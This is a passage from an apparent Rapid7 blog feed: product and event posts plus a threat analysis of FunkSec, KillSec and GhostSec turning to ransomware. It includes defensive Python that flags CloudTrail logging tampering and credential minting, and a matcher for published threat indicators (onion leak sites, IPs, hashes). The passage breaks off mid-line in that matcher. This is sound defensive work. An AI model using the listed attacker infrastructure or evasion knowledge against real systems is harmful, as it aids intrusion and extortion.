At the center of this shift is Rapid7 Incident Command, a unified platform that redefines modern detection and response. Trained on trillions of real-world alerts from Rapid7’s 24/7 Managed Detection and Response (MDR) service, Incident Command can accurately classify benign activity 99.93 percent of the time. This precision saves hundreds of analyst hours each week and drastically reduces noise.

Incident Command connects exposure data directly to detection logic, helping analysts see which threats are most likely to impact their organization. Built-in automation enables teams to isolate hosts, revoke credentials, or run response playbooks, while keeping humans in control of every action.

With asset-based pricing and a fast, cloud-based deployment model, organizations can scale visibility and response without the fear of surprise costs or drawn-out implementations.

A new chapter for defenders

Legacy SIEM served its purpose, but it was built for a different era. The modern SOC requires a platform that is unified, intelligent, and focused on outcomes.

The End of Legacy SIEM and the Rise of Incident Command explores how this transformation is reshaping detection and response for security teams everywhere.

Read the full whitepaper to learn why the future of SIEM is already here and how you can take command of what comes next.

Key Takeaways from the Take Command Summit 2025: Demystifying Cloud Detection & Response – The Future of SOC and MDR

10 June 2025 at 09:00

Cloud adoption has fundamentally reshaped security operations, bringing flexibility and scalability, but also complexity. In this session from the Take Command 2025 Virtual Cybersecurity Summit, Rapid7’s product leaders discussed how today’s SOC and MDR capabilities must evolve to keep up. Hosted by Ellis Fincham, the panel featured Dan Martin and Tyler Terenzoni, who shared real-world insights on what cloud detection and response truly requires, what CNAPP can and can’t solve, and how to bridge the growing gap between alerts and actionable context.

The cloud has changed the rules

Traditional SOC tooling often struggles to keep up with cloud-native architectures. Dan Martin opened the discussion by highlighting a key shift:

“Detection doesn’t start at the endpoint anymore. It starts with understanding your architecture.”

The panel emphasized that while cloud offers flexibility and scale, it also introduces operational complexity. From short-lived containers to decentralized ownership, cloud environments require a different approach.

Visibility is the starting point

Tyler Terenzoni spoke to the importance of understanding what’s running and who owns it:

“There’s always a disconnect between what engineering thinks is in the environment and what security actually sees.”

He noted that cloud visibility isn’t just about logs, but also understanding user behavior, policy changes, and asset configuration in near real-time. Without this, SOC teams are often reacting to alerts without enough context.

This issue was reflected in the post-event survey, where 35% of respondents listed lack of visibility across the environment as a primary challenge in their threat detection efforts.
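As an added example (not code from the session or from Rapid7), the following Python script shows what "visibility beyond logs" looks like in practice: it triages a small batch of constructed CloudTrail-style events, surfaces IAM policy changes, credentials minted for other principals, and attempts to stop logging, and attaches the context an analyst needs to act (who, from where, whether MFA was used, and what was touched). The eventName values are AWS CloudTrail's documented names for IAM and CloudTrail API calls; the sample records and the severity rules are this example's own assumptions, not a product's detection content.

```python
"""Triage control-plane changes in a batch of CloudTrail-style events.

Added example for this page, not code from the session or from Rapid7.
SAMPLE_EVENTS is constructed for illustration; the severity rules below
are assumptions made for this example.
"""
import json

# Calls that change who may do what, or that blind the SOC.
POLICY_CHANGE = {
    "PutUserPolicy", "PutRolePolicy", "AttachUserPolicy", "AttachRolePolicy",
    "CreatePolicyVersion", "UpdateAssumeRolePolicy",
}
CREDENTIAL_CREATION = {"CreateAccessKey", "CreateLoginProfile"}
LOGGING_TAMPER = {"StopLogging", "DeleteTrail", "UpdateTrail", "PutEventSelectors"}
SEVERITY_RANK = {"high": 0, "medium": 1, "low": 2}


def classify(event):
    """Map an event to a detection category, or None if it is routine."""
    name = event.get("eventName")
    if name in LOGGING_TAMPER:
        return "logging_tamper"
    if name in POLICY_CHANGE:
        return "policy_change"
    if name in CREDENTIAL_CREATION:
        return "credential_creation"
    return None


def actor_of(event):
    """Return (arn, user_name, mfa_used) for the principal making the call."""
    ident = event.get("userIdentity", {})
    attrs = ident.get("sessionContext", {}).get("attributes", {})
    return ident.get("arn", "unknown"), ident.get("userName"), attrs.get("mfaAuthenticated") == "true"


def severity(category, event):
    """Prioritisation rules (assumptions for this example, not a standard)."""
    arn, user, mfa = actor_of(event)
    params = event.get("requestParameters") or {}
    if category == "logging_tamper":
        return "high"  # losing telemetry is always urgent
    if category == "policy_change":
        # Policy edits by root, or by anyone without MFA, go to the top.
        return "high" if arn.endswith(":root") or not mfa else "medium"
    target = params.get("userName")
    if target and target != user:
        return "high"  # a credential minted for a *different* principal
    return "low"       # self-service key rotation is routine


def triage(events):
    """Return findings for non-routine events, most severe (then oldest) first."""
    findings = []
    for event in events:
        category = classify(event)
        if category is None:
            continue
        arn, _, mfa = actor_of(event)
        params = event.get("requestParameters") or {}
        findings.append({
            "time": event.get("eventTime"),
            "event": event["eventName"],
            "category": category,
            "severity": severity(category, event),
            "actor": arn,
            "source_ip": event.get("sourceIPAddress"),
            "mfa": mfa,
            "target": params.get("userName") or params.get("name"),
        })
    findings.sort(key=lambda f: (SEVERITY_RANK[f["severity"]], f["time"]))
    return findings


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {"eventTime": "2025-06-10T09:00:01Z", "eventName": "ListBuckets",  # routine read
     "userIdentity": {"type": "IAMUser", "userName": "alice",
                      "arn": "arn:aws:iam::111122223333:user/alice"},
     "sourceIPAddress": "203.0.113.10"},
    {"eventTime": "2025-06-10T09:05:12Z", "eventName": "AttachUserPolicy",  # MFA-backed
     "userIdentity": {"type": "IAMUser", "userName": "alice",
                      "arn": "arn:aws:iam::111122223333:user/alice",
                      "sessionContext": {"attributes": {"mfaAuthenticated": "true"}}},
     "sourceIPAddress": "203.0.113.10",
     "requestParameters": {"userName": "svc-backup",
                           "policyArn": "arn:aws:iam::aws:policy/AdministratorAccess"}},
    {"eventTime": "2025-06-10T09:07:44Z", "eventName": "CreateAccessKey",  # key for someone else
     "userIdentity": {"type": "IAMUser", "userName": "bob",
                      "arn": "arn:aws:iam::111122223333:user/bob"},
     "sourceIPAddress": "198.51.100.7",
     "requestParameters": {"userName": "svc-backup"}},
    {"eventTime": "2025-06-10T09:09:03Z", "eventName": "StopLogging",  # trail switched off
     "userIdentity": {"type": "AssumedRole",
                      "arn": "arn:aws:sts::111122223333:assumed-role/Admin/session",
                      "sessionContext": {"attributes": {"mfaAuthenticated": "false"}}},
     "sourceIPAddress": "198.51.100.7",
     "requestParameters": {"name": "org-trail"}},
]

if __name__ == "__main__":
    print(json.dumps(triage(SAMPLE_EVENTS), indent=2))
```

The point of the example is the enrichment, not the match list: the same CreateAccessKey call is routine when a user rotates their own key and high-priority when it is issued for another principal, and a StopLogging call from an assumed role is the kind of configuration change that never appears in workload logs at all. In a real pipeline the same fields would be joined to asset ownership and identity data so that the analyst sees the answer to "who owns this and is it expected" alongside the alert.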

CNAPP isn’t the answer - but it helps

The panel clarified that Cloud-Native Application Protection Platforms (CNAPPs) are useful, but not a complete solution. According to Dan Martin:

“CNAPP is great for giving you coverage, but it doesn’t give you the operational context your SOC needs.”

Integrating CNAPP data into SIEM, XDR, and MDR platforms enables richer investigations and tighter correlation across sources.

The shift from alerts to contextual action

Rather than focusing on the volume of alerts, the speakers urged security leaders to ask: can we act on this alert quickly and with confidence?

Dan Martin shared:

“It’s not about reducing alerts, it’s about giving your analysts the context to know what matters and what to do about it.”

Tyler Terenzoni added that turning alerts into action requires better integrations and unified telemetry. Without that foundation, even advanced detections can lead to noise and inefficiency.

AI will play a role, but not alone

While the session didn’t center on AI, the panel acknowledged its growing role in detection workflows. Dan Martin noted:

“AI helps with triage and correlation, but your success still depends on how well your tools talk to each other.”

The emphasis was on automation that supports analysts, not replaces them, especially in cloud environments where missteps can be costly.

Watch the full session on demand

If your team is looking to strengthen cloud detection, improve response times, or better align MDR with cloud operations, this session offers real-world insights and practical guidance.

Watch the Full Session

Cultivating Growth and Development at Rapid7

6 June 2025 at 08:58

At Rapid7, we’re pushing the boundaries on what a cybersecurity company can be as we work to build a more secure digital future. In a field where the threat landscape continues to evolve, continuous learning and the development of our people become an engine for company success and innovation. With more than a dozen offices around the world, Rapid7’s culture provides a foundation where people can grow their skills and progress in their careers, while driving meaningful impact for the business.

We sat down with three Rapid7 team members from different departments, and across our global offices, and invited them to share more about their own career growth and development. Through the experiences of Vladislav Pavlovski, Manager, Website Development, Courtney Cronin, Account Executive, Commercial, and Daniel McGreevy, Senior Technical Support Engineer, we see a consistent emphasis on teamwork, support from managers, and recognition to fuel career trajectories for Rapid7 employees around the world.

How Rapid7 Managers Support Career Growth

A prominent aspect of Rapid7's culture is the accessibility of leaders and the strong mentorship opportunities available. When stepping into a leadership role to relaunch the company website, Vladislav Pavlovski highlighted how his director, Victoria Krichevsky, helped him balance development work with coordination responsibilities.

"Her feedback helped me realize that I didn’t have to do everything myself — that success meant enabling others as well,”

Vladislav said.

“Her support helped me connect the dots between day-to-day execution and longterm vision and made a big difference in how confident I felt navigating this new territory."

This exemplifies how leaders at Rapid7 provide guidance and support that go beyond task management, focusing on broader growth.

“When I eventually moved into the Website Development Manager role, it was not only the result of the work I put in, but also the outcome of having strong, intentional support from someone who believed in the direction we were heading. That experience really shaped how I think about leadership and mentorship today,”

he said.

For Courtney, her manager also played a direct role in helping her prepare for a promotion opportunity from Sales Development Representative to Account Executive.

“I had the opportunity to meet with each of the Commercial Sales Managers to sharpen my skills as a future AE. We focused on roleplays, reviewed enablement on our products and services, introduced negotiation strategies, and refined my presentation skills. That level of investment in my development from both my current manager and the team I was looking to grow into made a huge impact, and I’m grateful for how collaborative and encouraging the team was during that transition.”

Courtney also shared how she values learning from her manager’s career growth as a woman in sales.

“I take full advantage of having a manager who started in the same role, especially as a woman in sales,”

she said.

“She understands the challenges firsthand and has been a huge influence in building my confidence. I make the most of her experience by asking for advice, learning how she navigated similar situations, and applying those lessons to my growth. Her journey and success show me what’s possible to achieve here at Rapid7, and I’m grateful to have her as both a mentor and a role model!”

Vladislav also noted,

"Leaders are accessible, and there’s a real openness to ideas from any level. It’s not about titles — it’s about potential and contribution."

This approach makes employees feel valued and encourages them to take ownership of their development.

Collaboration as a Catalyst for Growth

In addition to support from leaders, Rapid7 works to create an environment where employees can seek encouragement and guidance from peers and cross-functional partners when faced with challenges.

Daniel McGreevy started at Rapid7 as an apprentice and leveraged the expertise of his colleagues to grow his own capabilities and progress through his career.

“Working with our Technical Support experts across multiple products, and getting feedback from Support Engineers helped improve enablement across Global Support and really impacted how I approach solving complex challenges,”

he said.

Additionally, he shared how collaboration with product management and engineering teams impact product releases and ensure support is ready and equipped to assist customers effectively.

“By collaborating with different teams across the business, we’re able to improve how we service our customers while gaining additional context on the business, our products, and the goals and objectives of each of the teams we partner with and how it contributes to our bigger company initiatives.”

Incorporating this holistic view has played a role in Daniel’s progression into a Senior Technical Support Engineer.

For Vladislav, leading the launch of a new website was a significant career milestone, but what he says he’s even more proud of was the collaboration and partnership between various teams to get it over the finish line.

“The website launch was a huge project with high visibility and complex cross-functional alignment,”

he said.

“We created a space where everyone felt safe to contribute, ask for help, experiment, and make mistakes. We built trust between team members, and when people are not afraid to challenge ideas and share concerns, that openness drives better outcomes for everyone.”

Career Opportunities at Rapid7

The stories of Vladislav, Courtney, and Daniel paint a vivid picture of career growth and development at Rapid7. From accessible leadership and structured support to recognition and empowerment, Rapid7 fosters an environment where employees can thrive.

To learn more about working at Rapid7, visit our careers site: careers.rapid7.com
To view all open jobs, visit careers.rapid7.com/jobs/search

India's Cyber Leaders Prepare for AI-Driven Threats

5 June 2025 at 23:00

As India's economy rapidly digitizes, cybersecurity challenges are becoming increasingly complex. This May, Rapid7 launched our inaugural Global Security Day series across India, bringing together top security leaders in Mumbai, Delhi, and Bengaluru to address the most pressing cyber threats facing organizations in 2025.

Key insights that emerged

Across all three cities, several critical themes emerged that are shaping India's cybersecurity landscape:

AI is No Longer Optional: Organizations recognize that AI has become essential for threat detection, exposure management, and SOC operations. The question is no longer whether to adopt AI, but how to implement it effectively.

Attack Surface Explosion: Cloud misconfigurations, insecure APIs, and identity misuse are driving today's biggest risks. Organizations are struggling to maintain visibility and control across increasingly complex environments.

SOC Modernization is Urgent: Traditional Security Operations Centers need fundamental transformation, with automation and AI at their core to handle the volume of modern threats.

Talent Gap Challenges: Upskilling and reskilling initiatives are critical to closing the cybersecurity talent gap that's affecting organizations globally, but particularly acutely in India's booming tech sector.

Regulatory Evolution: India's evolving cybersecurity regulatory landscape is shaping how organizations approach their security investments and strategy development.

A journey across India's cyber capital cities

Our three-city roadshow, organized in collaboration with Information Security Media Group (ISMG), focused on the theme "2025 Cyber Threat Predictions: AI-Driven Attacks, Ransomware Evolution, and Expanding Attack Surface." The response from India's cybersecurity community was overwhelming, with 138 security leaders and delegates participating across all three cities.

Launching with impact in Mumbai (May 8)

Our Mumbai kickoff set the tone for the entire series, drawing 43 security leaders eager to dive into critical cybersecurity challenges. Rob Dooley, General Manager APJ, welcomed attendees before Regional CTO Robin Long delivered comprehensive insights on:

The highlight was our fireside chat featuring Starlin Ponpandy, CISO of Orion Systems and Rapid7 customer, discussing ‘Building a New-Age SOC: Practical Applications of AI’. The conversation explored choosing the right SOC model, building effective teams, and navigating the complexities of AI trust and explainability.

The main focus of the Q&A was the evolving cyber threat landscape and how organizations can prepare for 2025's AI-driven, increasingly complex attack environment.

The conversation was dominated by leaders sharing insights on the rise of AI-powered threats, the shift in ransomware tactics to double and hybrid extortion and the urgent need for proactive threat exposure management. Rapid7's emphasis on real-time, AI-enabled defenses and automated risk management strategies sparked strong engagement.

Strategic dialogue in Delhi (May 13)

Our Delhi event brought together 43 delegates for candid, strategic discussions about 2025's top cyber threats. Security leaders engaged in deep conversations about AI-powered detection and defense, proactive exposure management, and building resilient SOCs with automation.

The panel discussion on ‘Building a New-Age SOC’ addressed critical challenges including the cybersecurity talent gap and integrating security into DevOps workflows. It was a thought-provoking conversation that examined identity-centric security models and the shift from traditional SOCs to Managed Detection and Response solutions.

Attendees posed incisive questions about upskilling teams in an AI-driven environment, managing tool sprawl, and operationalizing security by design - highlighting the sophisticated thinking of India's cybersecurity leadership.

Tactical discussions in India’s Silicon Valley - Bengaluru (May 15)

Our Bengaluru finale drew the largest crowd with 52 delegates, including CISOs and cybersecurity executives from across South India. The discussions were highly tactical, focusing on:

  • Modernizing SOCs through AI-led threat detection
  • Countering double and triple extortion ransomware
  • Risk automation and secure cloud transformation

Veteran industry speaker Satish Kumar Dwibhashi joined Robin Long for discussions that reinforced a clear theme: security strategy must evolve in lockstep with attacker innovation.

Building for the future

The success of our India Security Days reflects not just the hunger for cybersecurity knowledge in the region, but also Rapid7's commitment to supporting India's digital transformation journey. We're excited to announce that we're expanding our presence with a Global Capability Center (GCC) in Pune, which will serve as a hub for innovation and home to teams across engineering, business support, and our Security Operations Center (SOC).

This initiative represents more than just business expansion - it's about building cybersecurity capability and expertise right here in India, that will shape a secure digital future for organizations around the world.

The road ahead

The conversations, connections, and insights from our India Security Days have reinforced our belief that India's cybersecurity community is among the most forward-thinking globally. The challenges are significant - from AI-powered attacks to evolving ransomware tactics - but so is the talent, innovation, and determination to address them.

As we look toward 2025 and beyond, events like these remind us that cybersecurity is ultimately about people: the security leaders making tough decisions, the practitioners implementing defenses, and the communities sharing knowledge and supporting each other.

Thank you to all the security leaders who joined us in Mumbai, Delhi, and Bengaluru. Your engagement, questions, and insights made these events truly impactful. We look forward to continuing these conversations and supporting India's cybersecurity community as we navigate the challenges and opportunities ahead.

Interested in joining our growing team in India? Learn more about career opportunities at our new GCC in Pune.

From Ideology to Financial Gain: Exploring the Convergence from Hacktivism to Cybercrime

3 June 2025 at 13:00

Co-authored by Yaniv Allender and Alexandra Blia

Introduction

In the ever-evolving landscape of cyber threat actors, the lines between ideologically driven hacktivism and financially motivated cybercriminals have become increasingly blurred. Originally fueled by political, social, or ethical causes, hacktivist groups have historically engaged in digital protest through website defacements, data leaks, and distributed denial of service (DDoS) attacks.

However, in recent years, a noticeable trend has emerged. Some hacktivist groups are evolving into ransomware operations and even becoming ransomware affiliates. This transformation is driven by a mix of ideological fatigue, opportunity for financial gain, access to sophisticated tools, and the growing profitability of extortion-based attacks. The result is a new hybrid threat actor—one that merges the disruptive zeal of hacktivism with the ruthless efficiency of cybercrime.

Understanding this shift is crucial for defenders, as it represents a convergence of motives that complicates attribution, response, and mitigation strategies. To this end, we have examined three prominent examples of relevant threat actors, namely FunkSec, KillSec, and GhostSec, identifying the drivers behind their transition to financially motivated campaigns and exploring the shift in their modus operandi.

Threat actor analysis

FunkSec

The FunkSec ransomware group emerged within the cybercrime ecosystem as a rising star in December 2024. The ransomware-as-a-service (RaaS) group has claimed at least 172 victims to date. The group proudly promotes itself as an AI-driven ransomware group, with their encryptor, FunkLocker, and some of the malware’s source code allegedly generated using generative AI tools.

The group targets organizations from various sectors and regions, such as government, education, automotive, energy, IT, and manufacturing, located in countries like the United States, Israel, France, Italy, Germany, India, and Australia.

FunkSec started as a politically motivated hacking (hacktivist) group, specifically interested in targeting the United States (Figure 1). The group was known to be aligned with the “Free Palestine” movement (Figure 2), and associated itself with other hacktivist groups, such as Ghost Algeria and Cyb3r Fl00d. Among its affiliates are Scorpion (AKA DesertStorm, a suspected Algeria-based hacker), El_farado, XTN, Blako, and Bjorka (an alleged Indonesian hacktivist). In its early days, the group offered tools commonly associated with hacktivist activities, including services for DDoS and defacement attacks.

Figure 1 - FunkSec’s activities as a hacktivist

Figure 2 - FunkSec’s statement against the USA and Israel

At some point, the group transitioned its focus from politically motivated attacks to a RaaS model, offering customizable tools to its affiliates. Its victimology also changed from government entities to organizations across various sectors, such as education, technology, telecommunications, and agriculture (Figure 3).

Figure 3 - FunkSec’s latest active DLS

FunkSec’s reliance on relatively simple malware development using AI-based tools also explains the fast transition of the group from targeted hacktivism campaigns to broader, financially-motivated activities, with a large number of victims in a short period of time (Figure 4).

Figure 4 - FunkSec’s victims on their DLS

The group’s transition has also been referenced on a Russian-speaking dark web forum, where the author mentioned a cybersecurity vendor’s article on FunkSec (Figure 5).

Figure 5 - FunkSec’s transition being referenced on a Russian-speaking dark web forum

KillSec

The KillSec hacktivist group (AKA Kill Security) has been active since at least 2021. The Russia-aligned group targets organizations from various sectors, such as government, finance, transportation, electronics, manufacturing, travel and recreation, retail, and consumer services, located in countries like India, Bangladesh, Romania, Poland, and Brazil. The group considers itself a “prominent hacktivist group operating in the cyber realm, with a focus on both disruption and digital activism."

KillSec initially emerged as a hacktivist group aligned with the Anonymous collective, with its operations primarily including DDoS attacks and website defacements, before pivoting to ransomware operations in October 2023. KillSec’s ransomware variants, namely KillSecurity 2.0 and KillSecurity 3.0, are designed to encrypt files and demand ransom payments for decryption.

In June 2024, KillSec introduced a RaaS operation, advertising a locker for Windows environments written in C++ and a dashboard, enabling affiliates to observe detailed statistics, conduct chat communications, and customize ransomware configurations using a builder tool. In November 2024, the group launched an additional locker for ESXi environments, expanding the breadth of its operations (Figure 6).

Figure 6 - KillSec launches locker for ESXi environments

The group’s shift is aligned with the overall proliferation of RaaS programs, enabling less technically skilled individuals to conduct ransomware attacks with relative ease in exchange for a fee. The group has been advertising its RaaS offering in an attempt to attract cybercriminals and further broaden its affiliate network (Figure 7).

Figure 7 - KillSec looking for affiliates

Although in certain incidents, KillSec leveraged solely stolen data to extort the victims, the group appears to adopt mainly double extortion tactics, exfiltrating data in addition to encrypting it and demanding a ransom payment to prevent it from being leaked. The group operates an active dedicated leak site (DLS) to which it uploads the data of victims who refuse to pay the ransom. The group also uses its DLS to advertise its services, which include penetration testing, data gathering, and its RaaS program (Figure 8).

Figure 8 - KillSec’s services

It should be noted that KillSec’s DLS also features a “For Sale” section, offering data allegedly exfiltrated from the targeted companies for sale, with the prices ranging between $5,000 and $350,000 (Figure 9). The group likely introduced this section in an attempt to further monetize the exfiltrated data. This offering of stolen data and additional services further suggests the financially motivated nature of the group’s activity.

Figure 9 - “For Sale” section on KillSec’s DLS

GhostSec

The GhostSec hacktivist group (AKA Ghost Security, GhostSecMafia, and GSM) has been active since at least 2015. The Anonymous-affiliated group gained prominence with the #OpIsis and #OpParis campaigns, in which various hacktivist groups took down thousands of ISIS websites and social media accounts using defacement and DDoS attacks. Since then, GhostSec has participated in campaigns such as #OpLebanon, #OpNigeria, #OpMyanmar, #OpEcuador, and #OpColombia. The group has also continuously launched cyberattacks on Israel in response to alleged war crimes, primarily defacing Israeli websites to spread “Free Palestine” messages.

GhostSec’s shift towards financially motivated operations overlaps with the group’s collaboration with cybercriminals. In July 2023, GhostSec announced that they formed a partnership with the Stormous ransomware group to target organizations in Cuba (Figure 10). Following this announcement, Stormous and GhostSec jointly claimed extortion attacks against three Cuban government ministries, and GhostSec also expressed the potential for future joint operations against other countries. In August 2023, GhostSec, together with ThreatSec, Stormous, Blackforums, and SiegedSec, collectively formed a unified collective, naming themselves “The Five Families” (Figure 11). This collective attempted to extort the presidential website of Cuba and the Brazilian organization Alfa Comercial.

Figure 10 - Announcement of the alliance between GhostSec and Stormous on their Telegram channel

Figure 11 - Announcement of the “Five Families” formation on their Telegram channel

GhostSec solidified its presence in the cybercriminal ecosystem with the launch of its RaaS program “GhostLocker” in October 2023, which was shortly followed by the release of its infostealer tool, GhostStealer (Figure 12). In January 2024, the updated “REWRITE” (aka GhostLocker 2.0) version of GhostLocker was released, with a fully featured management panel allowing affiliates to track campaigns and payouts. The threat actor promoted its malware-as-a-service (MaaS) tools heavily on its Telegram channels, demonstrating its intention to attract affiliates and, in turn, maximize its profits.

Figure 12 - GhostLocker’s release announcement


On May 15, 2024, GhostSec announced its retirement from cybercriminal activities and its return to hacktivism. The group stated that it reached this decision after having obtained enough funding to support its hacktivist operations. GhostSec further mentioned that Stormous would remain in charge of the management and operation of GhostLocker (Figure 13).

Figure 13 - GhostSec’s retirement from cybercriminal activities

It should be noted that Stormous had seemingly incorporated GhostLocker into its operations even before GhostSec’s retirement. As of May 2025, Stormous is still active and operates the Stormous RaaS program, which appears to be a continuation of GhostLocker. This development illustrates the mutual assistance and influence among allied threat groups: collectives like the Five Families let their members maximize the impact and breadth of their operations by sharing resources, audiences, and knowledge.

Two sides of the same coin?

This analysis shows that the threat actors in scope, FunkSec, KillSec, and GhostSec, have followed a similar trajectory, pivoting from politically motivated, disruptive campaigns to financial extortion. This transition is likely facilitated by the public availability of leaked ransomware builders, such as LockBit 3.0, which threat actors can leverage to develop their payloads.

The groups specifically appear to have adopted double extortion tactics, exfiltrating data from their victims and then encrypting it, in an attempt to pressure them to comply with their ransom demands. However, despite their seeming ability to conduct ransomware operations, these groups appear to lack the level of sophistication and specialization that characterize top-tier cybercriminal groups, such as Cl0p and LockBit, which are mentioned in the Rapid7 Q1 2025 ransomware report.

Interestingly, all three groups embraced RaaS as their business model while pivoting towards cybercrime. This evolution aligns with the current state of the ransomware ecosystem, where RaaS programs have become increasingly common. Such programs underline the financial nature of the groups’ activities: affiliates use the ransomware kit for a fee plus a percentage of each collected ransom, which lets the operators maximize profits by scaling out the number of intrusions beyond what the core group could conduct itself.

The transition of FunkSec, KillSec, and GhostSec has also broadened the victimology of their operations. While these groups once operated as hacktivists that primarily targeted government entities, their scope widened significantly once they shifted to ransomware attacks. In the process, their targeting moved from deliberate to opportunistic: organizations of any size, sector, or geography that could be compromised relatively easily.

While all of these groups follow the pattern, shifting from hacktivism to cybercrime, and specifically financially motivated RaaS operations, the reason behind this transition remains unclear. As an exception, GhostSec appears to have embraced cybercrime in an attempt to gather funding for its hacktivist operations, according to its exit message. It should be noted that other threat actors, such as CyberVolk, have also launched RaaS programs to fund their operations, but these efforts remain scarce.

Finally, other hacktivist groups, such as Ikaruz Red Team and their affiliates, also operate ransomware, but they do so to cause disruption and make political statements. Thus, the scope of their operations differs from financial gain and is not comparable to that of the groups included in this analysis.

Conclusion

The evolution of FunkSec, KillSec, and GhostSec from hacktivist collectives to RaaS operations highlights a recent shift in the motivations driving cybercriminal behavior. Initially, these groups were propelled by political and ideological aims, targeting governments and organizations in alignment with their perceived causes. Over time, however, their focus has clearly shifted towards financial gain, as evidenced by their adoption of RaaS models that prioritize profit over ideology. As cybercriminals adapt to “market demands,” financial motivation has come to dominate their activities, leaving behind the ideological roots of their earlier campaigns.

Indicators of compromise (IoCs)

FunkSec

  • Darkweb DLS:
      • funksec53xh7j5t6ysgwnaidj5vkh3aqajanplix533kwxdz3qrwugid[.]onion
      • funksec7vgdojepkipvhfpul3bvsxzyxn66ogp7q4pptvujxtpyjttad[.]onion
      • funksecsekgasgjqlzzkmcnutrrrafavpszijoilbd6z3dkbzvqu43id[.]onion
  • Clearweb DLS: http://funksec[.]top
  • Funkforum: http://funk4ph7igelwpgadmus4n4moyhh22cib723hllneen7g2qkklml4sqd[.]onion
  • Session ID: 0538d726ae3cc264c1bd8e66c6c6fa366a3dfc589567944170001e6fdbea9efb3d

GhostSec

  • SHA256:
      • 8b758ccdfbfa5ff3a0b67b2063c2397531cf0f7b3d278298da76528f443779e9
      • c9f71fc4f385a4469438ef053e208065431b123e676c17b65d84b6c69ef6748a
      • a1b468e9550f9960c5e60f7c52ca3c058de19d42eafa760b9d5282eb24b7c55f
      • 3ecf05857d65f7bc58b547d023bde7cc521a82712b947c04ddf9d7d1645c0ce0

Stormous

KillSec

  • DLS: http://ks5424y3wpr5zlug5c7i6svvxweinhbdcqcfnptkfcutrncfazzgz5id[.]onion
  • Telegram channel: https://t.me/killsecc
  • TOX ID: 9453686EAB63923D1C35C92DDE5E61A6534DD067B5448C1C8D996A460B92CA5055C1AB0FCD22
  • Session ID: 05cb94c52170c8119f7ebc2d8afc94b9746bc7c361d91c49e7d18e96e266582a07
  • SHA256: 8cee3ec87a5728be17f838f526d7ef3a842ce8956fe101ed247a5eb1494c579d
  • IP addresses: 82[.]147[.]84[.]98, 77[.]91[.]77[.]187, 93[.]123[.]39[.]65

Rapid7 customers

InsightIDR and Managed Detection and Response (MDR) customers have existing detection coverage through Rapid7's expansive library of detection rules. Below is a non-exhaustive list of detections that are deployed and will alert on behavior related to the FunkSec, KillSec, and GhostSec ransomware activity. We will also continue to iterate detections as new variants emerge, giving customers continuous detection without manual tuning:

Suspicious Process - Malicious Hash On Asset

While this specific detection directly covers malicious binaries linked to ransomware operations, customers also benefit from a comprehensive suite of detections that alert on post-exploitation behavior often observed prior to ransomware deployment. These include detections for lateral movement, privilege escalation, and suspicious persistence mechanisms, providing layered defense even when the specific ransomware payload is novel or obfuscated.
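To make the indicator list above directly usable, here is an added example (written for this edit, not Rapid7 detection content or code from the groups discussed): a small Python matcher that loads the published FunkSec, KillSec and GhostSec indicators, refangs them, and scans endpoint events for file-hash, destination-IP and DNS matches. The key=value event schema, the field names, and the sample events are assumptions constructed for the example; only the indicator values come from the page.

```python
# Added example: match the published FunkSec/KillSec/GhostSec IoCs against
# constructed endpoint telemetry. Log schema and sample events are assumptions.
import re
from urllib.parse import urlparse

# Indicators as published on the page (defanged), tagged with their group.
RAW_IOCS = [
    ("domain", "funksec53xh7j5t6ysgwnaidj5vkh3aqajanplix533kwxdz3qrwugid[.]onion", "FunkSec"),
    ("domain", "funksec7vgdojepkipvhfpul3bvsxzyxn66ogp7q4pptvujxtpyjttad[.]onion", "FunkSec"),
    ("domain", "funksecsekgasgjqlzzkmcnutrrrafavpszijoilbd6z3dkbzvqu43id[.]onion", "FunkSec"),
    ("domain", "funksec[.]top", "FunkSec"),
    ("domain", "funk4ph7igelwpgadmus4n4moyhh22cib723hllneen7g2qkklml4sqd[.]onion", "FunkSec"),
    ("sha256", "8b758ccdfbfa5ff3a0b67b2063c2397531cf0f7b3d278298da76528f443779e9", "GhostSec"),
    ("sha256", "c9f71fc4f385a4469438ef053e208065431b123e676c17b65d84b6c69ef6748a", "GhostSec"),
    ("sha256", "a1b468e9550f9960c5e60f7c52ca3c058de19d42eafa760b9d5282eb24b7c55f", "GhostSec"),
    ("sha256", "3ecf05857d65f7bc58b547d023bde7cc521a82712b947c04ddf9d7d1645c0ce0", "GhostSec"),
    ("domain", "ks5424y3wpr5zlug5c7i6svvxweinhbdcqcfnptkfcutrncfazzgz5id[.]onion", "KillSec"),
    ("sha256", "8cee3ec87a5728be17f838f526d7ef3a842ce8956fe101ed247a5eb1494c579d", "KillSec"),
    ("ip", "82[.]147[.]84[.]98", "KillSec"),
    ("ip", "77[.]91[.]77[.]187", "KillSec"),
    ("ip", "93[.]123[.]39[.]65", "KillSec"),
]


def refang(value: str) -> str:
    """Reverse common defanging so published IoCs compare equal to live telemetry."""
    return (value.replace("[.]", ".")
                 .replace("hxxps://", "https://")
                 .replace("hxxp://", "http://"))


# (kind, normalized value) -> group, built once from the published list.
LOOKUP = {(kind, refang(value).lower()): group for kind, value, group in RAW_IOCS}

# Assumed mapping from log field names to the kind of observable they carry.
FIELD_KINDS = {"sha256": "sha256", "dst": "ip", "src": "ip", "qname": "domain", "url": "url"}
FIELD_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')


def parse_event(line: str) -> dict:
    """Split a key=value event line into a dict, dropping surrounding quotes."""
    return {k: v.strip('"') for k, v in FIELD_RE.findall(line)}


def match_domain(host: str):
    """Return the IoC domain matching host or any of its parent domains, else None."""
    labels = host.lower().rstrip(".").split(".")
    for i in range(len(labels) - 1):
        candidate = ".".join(labels[i:])
        if ("domain", candidate) in LOOKUP:
            return candidate
    return None


def observables(event: dict):
    """Yield (kind, value) pairs worth checking from one parsed event."""
    for key, value in event.items():
        kind = FIELD_KINDS.get(key)
        if kind == "url":
            host = urlparse(value).hostname  # compare the host part only
            if host:
                yield ("domain", host)
        elif kind:
            yield (kind, value)


def scan(lines):
    """Return one hit per matching observable: line index, kind, matched IoC, group."""
    hits = []
    for idx, line in enumerate(lines):
        for kind, value in observables(parse_event(line)):
            if kind == "domain":
                matched = match_domain(value)
            else:
                matched = value.lower() if (kind, value.lower()) in LOOKUP else None
            if matched:
                hits.append({"line": idx, "kind": kind, "value": matched,
                             "group": LOOKUP[(kind, matched)]})
    return hits


# Constructed sample telemetry (not real events) in the assumed key=value format.
SAMPLE_LOGS = [
    'ts=2025-05-20T10:01:02Z host=WS01 event=process_create '
    'image="C:\\Users\\bob\\AppData\\Local\\Temp\\update.exe" '
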